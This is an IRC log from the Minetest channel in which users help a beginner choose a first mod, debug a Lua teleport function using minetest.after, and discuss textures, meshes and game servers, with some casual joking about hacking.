20:54 VanessaE yeah
20:55 kaeza suddenly... blackholes: https://dl.dropbox.com/u/100008207/screenshot_4262554471.jpg
20:55 Octupus i need a new mod idea that i can handle
20:55 VanessaE I figured I'd hit this wall too, but it was worth a try.
20:55 Traxie21 Octupus, try Economy
20:55 Traxie21 What wall are you talking about?
20:56 Octupus Traxie21: how do you mean?
20:56 Traxie21 Try making an economy mod
20:56 PilzAdam Octupus, how experienced are you?
20:56 Traxie21 wait, isn't octopus jojoba?
20:56 OldCoder No
20:56 Traxie21 ...
20:56 OldCoder He runs other worlds
20:56 Traxie21 I was sure....
20:56 OldCoder 0004
20:56 OldCoder 30004
20:57 Octupus PilzAdam,i made 3 mods tools about 32 new blocks and a mod that adds water but i cant ever figured out the landgen thingy
20:57 Wuzzy2 joined #minetest
20:57 kaeza jojoa is even more annoying than octu
20:57 kaeza lol J/K :P
20:57 Octupus HEY :P
20:57 PilzAdam Octupus, hmm
20:59 Traxie21 Octopus, I'm kinda new to modding, but I'd advise trying to make a server mod, like commnds and the like
20:59 Traxie21 Similar to bukkit plugins
20:59 Traxie21 There's tons of block-and-tool mods, but not a lot of server ones
20:59 Traxie21 IMHO
20:59 mauvebic theme mods
20:59 Octupus i tried to make a broadcast command but i cant figure that out
20:59 PilzAdam Octupus, something useless to learn coding: a tool that places a light block on leftclick; when punching this lightblock it changes the color
21:00 mauvebic offer period nodes, textures and tools
21:00 PilzAdam (not the light color but the texture)
21:00 mauvebic people want cars, mobs, better node protection
21:00 Octupus PilzAdam,idk how to do that
21:00 mauvebic + theres tons of broken shit you can try fixing
21:00 PilzAdam learn it ;-)
21:01 Octupus ik how to make a tool that digs something
21:01 kaeza Octupus, how about a simple mod that computes the distance travelled by a player and reports back with a /dist command?
21:01 mauvebic ugh, just drank from the wrong coffee cup :S
21:01 Octupus kaeza,im not that good
21:01 PilzAdam you have to use callbacks like on_use or on_punch
21:01 Traxie21 kaeza, NO MATH
21:01 Traxie21 Math+programming is hard for dumb people like me :3
21:01 PilzAdam that brings you to learn what Lua functions are, and how to use them
21:02 kaeza oh sorry :P
21:02 mauvebic programming is almost like math with words lol
21:02 kaeza mauvebic, programming = math + logic
21:03 kaeza if you suck at any of those, programming is not for you
21:03 Octupus PilzAdam,Can i get a link to something i can read to understand?
21:03 PilzAdam everything you need to know is here: https://github.com/celeron55/minetest/blob/master/doc/lua_api.txt
21:03 Traxie21 @kaeza, Theres lots of mods you can make with a basic understanding of math
21:03 mauvebic im pretty sure logic applies to math too?
21:03 mauvebic lol
21:04 PilzAdam Octupus, take your time, nobody forces you to make a mod in 30 mins.
21:04 kaeza mauvebic, maybe, but they are different things
21:04 mauvebic the only places where logic doesn't apply is in politics and law lol
21:04 PilzAdam Octupus, is english your native language?
21:04 Octupus PilzAdamn thank you i will read this carefully
21:04 Traxie21 WIN mauv
21:05 Octupus yes PilzAdam
21:05 Calinou I understand lua_api.txt perfectly, yet english is not my native language :P
21:05 Traxie21 Do any of you expert coders have free time to see how bad my code is?
21:05 PilzAdam Calinou, the difference is that you have some experience in programming
21:05 PilzAdam Traxie21, LOC?
21:05 mauvebic i offer an express insult and derision service
21:05 mauvebic :p
21:06 Traxie21 LOC? What does that mean?
21:06 PilzAdam Lines Of Code
21:06 Traxie21 Not sure,using wordpad XD
21:06 PilzAdam there is a thing called google :-p
21:06 Exio wordpad for coding
21:07 RealBadAngel kamikaze ;)
21:07 Calinou emacs for writing press articles
21:07 PilzAdam Traxie21, http://youtu.be/4XpnKHJAok8?t=6m54s
21:07 Octupus i understand aliases :P
21:07 mauvebic chase programmer prolly uses minesweeper or paint for coding lol
21:07 Calinou lol
21:07 Traxie21 161 lines
21:07 Traxie21 @Plitz I know
21:08 kaeza <Traxie21> Do any of you expert coders have free time to see how bad my code is?
21:08 PilzAdam wtf is Plitz?
21:08 kaeza ??
21:08 Traxie21 LOL
21:08 Traxie21 I always read your name as PlitzAdam
21:08 kaeza Traxie21, Pil<Tab>
21:08 Traxie21 *PilzAdam
21:08 PilzAdam P<tab> is enough
21:09 kaeza you're right :)
21:09 Calinou c<tab> => :-D
21:09 mauvebic id use the acronym PA but that means something else here lol
21:10 PilzAdam https://en.wikipedia.org/wiki/Pa
21:10 Calinou penny arcade?
21:10 Calinou :-D
21:10 mauvebic prince albert lol
21:10 kaeza Paranormal Activity?
21:10 PilzAdam "P.A., a southern hip hop trio in Atlanta"
21:11 Traxie21 Oi, if theres two things I'm bad at in programming, one is math, the other is naming variables XD
21:11 mauvebic ya'll know the urban dictionary def right? lol
21:13 Octupus PilzAdam,i understand alot of this
21:14 Octupus but i cant code big stuff xD
21:14 PilzAdam with "Take your time" I mean something like a week or so
21:14 mauvebic yay i found low poly hover vehicles :D
21:14 Octupus yea ik but i understand what there are saying in the text
21:15 PilzAdam thats a good starting point :-)
21:15 Traxie21 I have a stupidly dumb question
21:15 Octupus :D
21:15 Octupus anything else i shud do
21:15 Traxie21 nvm
21:15 PilzAdam Traxie21, print(dump(question))
21:15 Octupus shud i look at complex codes and see what they do
21:16 Traxie21 Nvm, I answered it myself
21:16 PilzAdam Octupus, read other mods code
21:16 PilzAdam its not important how complex they are
21:17 PilzAdam e.g. read my mods to see correct indentation
21:17 Octupus Which 1 do you recommend for me to read?
21:18 PilzAdam well, the default mod is pretty basic
21:18 PilzAdam but its not very interesting
21:18 Octupus yea i understand those i mean like your mods
21:18 PilzAdam just read the code of your favourite mods
21:19 Octupus hmmmmm
21:19 PilzAdam you dont have to fully understand them
21:19 PilzAdam just to get an idea on how a mod should "look like"
21:20 Octupus ok il read farming since i like that mod alot
21:20 Traxie21 Moment of truth... Did I miss an "end" or not *drum rull*
21:20 PilzAdam the only downside of lua-api.txt is that there are no examples so you have to figure out how to structure your init.lua
21:20 Octupus Traxie can i see you code?
21:20 PilzAdam the default mod is a good reference for that
21:21 Octupus yea i sort mines out line by line
21:21 nyuszika7h joined #minetest
21:21 Traxie21 What does 'attempting to call field "func" a nil value' mean?
21:21 Traxie21 In a second octupus, im currently editing it
21:22 mauvebic means .func isn't set
21:22 Octupus K
21:22 mauvebic array['func'] = ?
21:22 Traxie21 No, its a function
21:22 mauvebic well what are you trying to do?
21:22 kaeza mauvebic, array['func'] == array.func
21:22 Traxie21 minetest.after to call a function with a parameter
21:22 PilzAdam Octupus, do you know any programming languages?
21:23 mauvebic minetest.after(1,function() end)
21:23 Octupus no im a newbie at coding OC has helped quite a bit
21:23 mauvebic you have to pass a function to minetest.after not just arguemnts
21:23 kaeza Traxie21, minetest.after(1, function (param) <your code here> end, param)
21:23 Traxie21 mauv, I just fixed it
21:24 Traxie21 how do you pass a param to a function?
21:24 Octupus traxie
21:24 kaeza Traxie21, minetest.after(1, function (param) <your code here> end, param) <== THIS
21:24 Octupus param = (what ever you trying to add)   or its param1 (what every you want to add  Traxie21
21:25 PilzAdam Octupus, its difficult to learn a programming language _and_ the minetest API at the same time; maybe it would help if you read some tutorials about any programming language to get some experience
21:25 Traxie21 That helps
21:25 Octupus ok PilzAdam yougot any tutorials in mind
21:25 mauvebic you can use any variable within minetest.after(d, function() end) so long as you dont have scope problems
21:27 PilzAdam Octupus, maybe this: http://chortle.ccsu.edu/java5/index.html (its Java)
21:27 PilzAdam its where I learned Java :-)
21:27 Octupus ok il try this
21:28 mauvebic javas been in the news afew times on /. this week lol
21:28 Octupus i might be able to make plugins soon for mc  :P
21:28 PilzAdam mauvebic, there was a major secutrity lag in java
21:28 PilzAdam *security
21:29 mauvebic something about a 2yr exploit?
21:29 mauvebic its ironic the sandboxing was supposed to provide extra security lol
21:29 Traxie21 minetest.after(teleport_delay, teleport_player(param), position)
21:29 kaeza Octupus, http://lua.org/pil
21:29 Traxie21 something isnt right there
21:30 mauvebic not working?
21:30 Calinou mauvebic: openjdk was unaffected by the security exploits :-D
21:30 kaeza Traxie21, nope
21:30 Traxie21 well, it calls the function
21:30 Calinou open source ftw
21:30 kaeza minetest.after(teleport_delay, teleport_player, position)
21:30 mauvebic do you define position or param?
21:31 mauvebic you could try minetest.after(teleport_delay, function() teleport_player(position) end)
21:31 Traxie21 It calls the function
21:31 Traxie21 But I can't access the param with "position"
21:31 kaeza Traxie21, the 2nd arg to minetest.after is a function; *not* a function *call*
21:31 mauvebic you could try minetest.after(teleport_delay, function() teleport_player(param) end)
21:32 kaeza mauvebic, the function you pass to minetest.after must have a way to get the param
21:32 Traxie21 Forgive me kaeza, I do not know my lingo
21:32 Traxie21 here, lemme pastebin this
21:33 mauvebic ive used it a few times with variables defined outside its scope w/o problems
21:33 kaeza mauvebic, bad coding practice
21:33 kaeza that's what function parameters are for
21:33 mauvebic yeah well you could take 10 years following all the rules to do what i can in 1 so its moot
21:33 Traxie21 http://pastebin.com/Rqgh6sHF
21:33 Traxie21 the p is set beforehand
21:34 Traxie21 the only issue is that when it runs the setpos, it gets a nil value
21:34 kaeza Traxie21, what is 'p'?
21:34 kaeza a position?
21:34 Traxie21 ye
21:35 Traxie21 im too lazy
21:35 Traxie21 I'll fix the var names later
21:35 kaeza http://pastebin.com/abWrwmUZ
21:36 kaeza note the small change in teleport_player
21:36 Octupus il take a break a little
21:36 Octupus i reached quite far already
21:36 Traxie21 oops
21:37 Traxie21 Thats what i get for following the wiki
21:37 Traxie21 XD
21:37 Traxie21 hmm
21:37 Traxie21 still setpos is a nil value
21:38 Traxie21 I bet that will be easy to fix
21:40 kaeza setpos may be a nil value cause tpr_list[value_carryover] is nil
21:41 Traxie21 kaeza, its still the param, I just debugged
21:41 PilzAdam Traxie21, can you show me your whole code?
21:42 Traxie21 tpr_list[value_carryover] is printing the proper value, but printing the param crashes the game
21:42 Traxie21 Sure.. one sec
21:42 kaeza Traxie21, then maybe 'p' is not set correctly
21:42 Traxie21 nope
21:42 Traxie21 printed that too
21:42 kaeza (it's the param that minetest.after passes to your function)
21:43 Traxie21 yea, thats the param that dosn't seem to be being passed
21:43 Traxie21 http://pastebin.com/Rqgh6sHF
21:43 Traxie21 wordpad is so hard to read without syntax highliting :I
21:44 kaeza Traxie21, use notepad++
21:44 Traxie21 My friend said not to install anything on his computer :L
21:45 mauvebic good advice
21:45 kaeza Traxie21, first of all, you should at least make sender & receiver module local on lines 8 & 9
21:45 Traxie21 wait
21:45 Traxie21 found it
21:45 kaeza ditto for lines 4 & 5
21:45 kaeza err
21:45 kaeza 3 &
21:45 kaeza 4
21:46 kaeza also, it's bad coding practice to use variables that way
21:47 kaeza you should arrange your code to use function params
21:47 kaeza it's called non-reentrancy
21:47 kaeza s/non-//
21:47 hmmmm http://i.imgur.com/BvbOb.png
21:48 Calinou lol
21:48 hmmmm w00t w00t g0t r00t
21:48 Calinou .exe...
21:48 babyface1031 joined #minetest
21:48 Traxie21 how does one effectively use function params?
21:49 FreeFull hmmmm:
21:49 Calinou hacking yourself ftw
21:49 hmmmm i did a stack override to get through the back door
21:49 Calinou everyone, GO HACK YOURSELF
21:49 shadowjay1 joined #minetest
21:49 FreeFull Calinou: Except that wouldn't even work with proxies
21:49 Calinou hmmmm: seems legit, police would like to have a talk with you :3
21:49 hmmmm aww, nobody got the jokes
21:50 PilzAdam Traxie21, have you found the bug?
21:50 FreeFull hmmmm: knocking is matrix
21:50 kaeza Traxie21, that depends
21:50 FreeFull for some reason it's sock5 instead of socks
21:50 hmmmm hah, no, port knocking is a real thing
21:51 PilzAdam Traxie21, requester = tpr_list[receiver] -> requester = minetest.get_player_by_name(tpr_list[receiver])
21:51 FreeFull hmmmm: I guess matrix borrowed it then
21:51 hmmmm no comments on the richard stallman background?
21:52 Traxie21 I got that Plitz
21:52 Traxie21 I keep getting unhandled exceptions
21:52 mauvebic does someone know why im only getting half a mesh ingame? http://www.zimg.eu/i/1740843665
21:52 marktraceur Hahaa, plitz
21:52 Traxie21 GOD
21:52 Traxie21 Keep forgetting
21:52 Traxie21 Pilz
21:52 kaeza Taoki, P<Tab>
21:52 kaeza whoop
21:53 kaeza s
21:53 kaeza Traxie21, ^
21:53 PilzAdam Traxie21, have you ever seen my forum signature?
21:53 PilzAdam http://forum.minetest.net/profile.php?id=2443
21:54 kaeza IDK who called him the mushroom man the other day lol
21:56 Traxie21 Nope, I never read signatures
21:56 Traxie21 :3
21:56 Traxie21 Sorry Adam
21:58 Traxie21 Oi, im getting tired of my code, so hard to read in black and white
22:04 FreeFull joined #minetest
22:07 kaeza Traxie21, use notepad++
22:07 Traxie21 I downloaded it
22:07 Traxie21 put it on an SD card XD
22:09 mauvebic every mesh i try, half of it is invisible :S http://www.zimg.eu/i/2763930696
22:10 Traxie21 O_O
22:11 babyface1031 can anyone help to figure out what this means
22:11 babyface1031 WARNING: StaticObjectList::remove(): id=3 not found
22:17 mauvebic ah i figured out why
22:17 mauvebic the guy made half a hover car, and used a "miror" modifier for the other half
22:17 mauvebic thats why half the car isn't there lol
22:20 sfan5 joined #minetest
22:22 Menche joined #minetest
22:23 Octupus hi sfan5, Menche
22:24 Menche hi
22:26 leo_rockway joined #minetest
22:39 Cybersoft joined #minetest
22:40 Cybersoft Just wanted to says thank you as minetest supports 128x textures out of the box (unlike minecraft)
22:40 Octupus everything went dead :/
22:41 Menche ya, didn't understand why i had to patch minecraft to use hi-res texturs
22:41 Octupus Menche,can i help you with you new server map?
22:41 Octupus i can build an awesome spawn for ya
22:42 Menche ok, i'll forward my other server out soon
22:43 Menche im copy-pasted much of the old spawn in, im rebuilding the roads now
22:43 Octupus k
22:43 Cybersoft I'm using LB photo realism 128x. but I can't find the texture when you break a block
22:43 Octupus so what im hearing is i can build spawn  ? :D
22:43 Cybersoft ie: the ones showing the break marks - any idea where it is?
22:43 Menche thats crack_anylength.png
22:44 Cybersoft and is there a way to use directX instead of opengl since this use irrlicht and that engine usually give the choice between the two?
22:45 Octupus Menche,for spawn would you like me to build an outdoor type spawn or an inside 1?
22:45 PilzAdam Cybersoft, n minetest.conf add: video_driver = direct3d8
22:45 PilzAdam *in
22:45 PilzAdam or direct3d9
22:46 Menche Octupus: i copied the old town hall over
22:46 Octupus :O
22:46 Octupus but i can still build something nice for the looks
22:46 Menche of course
22:46 john_minetest left #minetest
22:47 Octupus i can build a mall where ppl can cluster in there with shops and not the old spawn Menche
22:47 Menche ok
22:47 Menche i'm not re-adding the shops around the old spawn
22:47 Octupus thats goood then
22:47 Menche that huge platform was kinda ugly
22:48 Menche try connecting to menche.servegame.com:30001
22:48 Menche port 30000 is the old map, 30001 the new
22:48 Octupus K
22:48 Cybersoft thanks, if I wanted to add block with slopes or curves in them where would I start?
22:49 Cybersoft ie: like a 10o sloped roof or a piece of cylinder
22:49 Octupus Menche,cant connect
22:50 Menche try now, my firewall was blocking it
22:50 Octupus k
22:50 Octupus got it
22:50 Octupus il build the mall for you right now menche
22:53 Jousway joined #minetest
22:55 PilzAdam Cybersoft, http://forum.minetest.net/viewtopic.php?id=4297
23:00 mauvebic let there be hovercars :-) http://www.zimg.eu/i/1257631186
23:00 mauvebic the colour is meant to keep insurance costs down :p
23:06 mauvebic are there good tutorials on blender/UV texture mapping?
23:11 PilzAdam going to sleep now; bye
23:15 Gambit joined #minetest
23:19 Zetetic` joined #minetest
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23:58 Cybersoft where are the block definition/model stored? I used a cactus texture from minecraft, but it seems the cactus block in minetest is larger because I'm getting transparency from the texture and I'd like to adjust it

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